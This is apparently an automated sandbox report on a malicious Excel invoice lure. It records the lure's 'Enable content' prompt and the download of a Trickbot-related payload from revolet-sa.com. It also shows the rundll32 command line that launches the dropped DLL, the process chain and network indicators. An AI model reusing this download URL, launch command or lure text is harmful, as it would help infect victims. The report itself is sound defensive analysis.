Loading ...

Play interactive tourEdit tour

Analysis Report 1A8C92C-1A8C92C.xls

Overview

General Information

Sample Name:1A8C92C-1A8C92C.xls
Analysis ID:383028
MD5:d8ed80402de2b621219044b3a2c022c5
SHA1:e2f86c9431081da7f57cc014a9f2f7b870ea0aad
SHA256:d98b11f1599985cc16c8dd10ea53ea5a1b9ac752d5d30c460c198b4a2a83ad9b
Tags:Invoicexls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1028 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2356 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 1204 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2472 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
1A8C92C-1A8C92C.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x12ebb:$e1: Enable Editing
  • 0x12c05:$e3: Enable editing
  • 0x12cd7:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://revolet-sa.com/files/countryyelow.phpAvira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 3M1Xc[1].fbx.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: revolet-sa.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.232.249.186:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.232.249.186:80
Source: Joe Sandbox ViewIP Address: 192.232.249.186 192.232.249.186
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: revolet-sa.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0A6ADC3.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /files/countryyelow.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: revolet-sa.comConnection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2088300999.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: revolet-sa.com
Source: rundll32.exe, 00000003.00000002.2088300999.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2088300999.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2088577447.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086825158.0000000002177000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2088577447.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086825158.0000000002177000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2087390316.0000000002870000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2088577447.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086825158.0000000002177000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2088577447.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086825158.0000000002177000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2087390316.0000000002870000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2088300999.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2088577447.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086825158.0000000002177000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2088300999.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. :54 Protected View Thi
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start 18 the decryption of the docum
Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3Screenshot OCR: Enable Content
Source: Document image extraction number: 4Screenshot OCR: Enable Editing
Source: Document image extraction number: 14Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 14Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 1A8C92C-1A8C92C.xlsInitial sample: EXEC
Source: 1A8C92C-1A8C92C.xlsInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3M1Xc[1].fbxJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: 1A8C92C-1A8C92C.xlsOLE indicator, VBA macros: true
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3M1Xc[1].fbx AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: Joe Sandbox ViewDropped File: C:\Users\user\sdbybsd.fds AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: 1A8C92C-1A8C92C.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2088300999.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal84.expl.evad.winXLS@7/8@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBEBC.tmpJump to behavior
Source: 1A8C92C-1A8C92C.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb source: sdbybsd.fds.0.dr
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00201030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_00201030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00880E20 push dword ptr [edx+14h]; ret 4_2_00880F2D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00850117 push esp; rep ret 4_2_00850118
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3M1Xc[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3M1Xc[1].fbxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3M1Xc[1].fbxJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00201030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_00201030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0018095E mov eax, dword ptr fs:[00000030h]4_2_0018095E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00180456 mov eax, dword ptr fs:[00000030h]4_2_00180456
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00201030 mov eax, dword ptr fs:[00000030h]4_2_00201030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00201030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,4_2_00201030
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution33Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSystem Information Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3M1Xc[1].fbx5%MetadefenderBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3M1Xc[1].fbx2%ReversingLabsWin32.Trojan.Trickpak
C:\Users\user\sdbybsd.fds5%MetadefenderBrowse
C:\Users\user\sdbybsd.fds2%ReversingLabsWin32.Trojan.Trickpak

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
4.2.rundll32.exe.3b0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://revolet-sa.com/files/countryyelow.php100%Avira URL Cloudmalware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
revolet-sa.com
192.232.249.186
truefalse
    unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://revolet-sa.com/files/countryyelow.phptrue
    • Avira URL Cloud: malware
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2088577447.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086825158.0000000002177000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comrundll32.exe, 00000003.00000002.2088300999.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2088300999.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpfalse
            high
            http://www.%s.comPArundll32.exe, 00000004.00000002.2087390316.0000000002870000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            low
            http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2088577447.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086825158.0000000002177000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000004.00000002.2087390316.0000000002870000.00000002.00000001.sdmpfalse
              high
              http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2088577447.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086825158.0000000002177000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2088300999.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpfalse
                high
                http://investor.msn.com/rundll32.exe, 00000003.00000002.2088300999.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086638686.0000000001F90000.00000002.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  192.232.249.186
                  revolet-sa.comUnited States
                  46606UNIFIEDLAYER-AS-1USfalse

                  General Information

                  Joe Sandbox Version:31.0.0 Emerald
                  Analysis ID:383028
                  Start date:07.04.2021
                  Start time:07:09:08
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 30s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:1A8C92C-1A8C92C.xls
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal84.expl.evad.winXLS@7/8@1/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 8.1% (good quality ratio 5.4%)
                  • Quality average: 64.3%
                  • Quality standard deviation: 45.9%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 9
                  • Number of non-executed functions: 4
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383028/sample/1A8C92C-1A8C92C.xls

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  07:09:39API Interceptor8x Sleep call for process: rundll32.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  192.232.249.186SecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsGet hashmaliciousBrowse
                  • revolet-sa.com/files/countryyelow.php
                  SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                  • revolet-sa.com/files/countryyelow.php
                  SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                  • revolet-sa.com/files/countryyelow.php
                  SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                  • revolet-sa.com/files/countryyelow.php
                  SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                  • revolet-sa.com/files/countryyelow.php

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  revolet-sa.comSecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsGet hashmaliciousBrowse
                  • 192.232.249.186
                  SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                  • 192.232.249.186
                  SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                  • 192.232.249.186
                  SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                  • 192.232.249.186
                  SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                  • 192.232.249.186

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  UNIFIEDLAYER-AS-1USSecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsGet hashmaliciousBrowse
                  • 192.232.249.186
                  SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                  • 192.232.249.186
                  SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                  • 192.232.249.186
                  SALM0BRU.exeGet hashmaliciousBrowse
                  • 162.241.148.243
                  Purchase Order.8000.scan.pdf...exeGet hashmaliciousBrowse
                  • 162.241.148.243
                  SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                  • 192.232.249.186
                  SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                  • 192.232.249.186
                  document-1251000362.xlsmGet hashmaliciousBrowse
                  • 192.185.48.186
                  document-1251000362.xlsmGet hashmaliciousBrowse
                  • 192.185.48.186
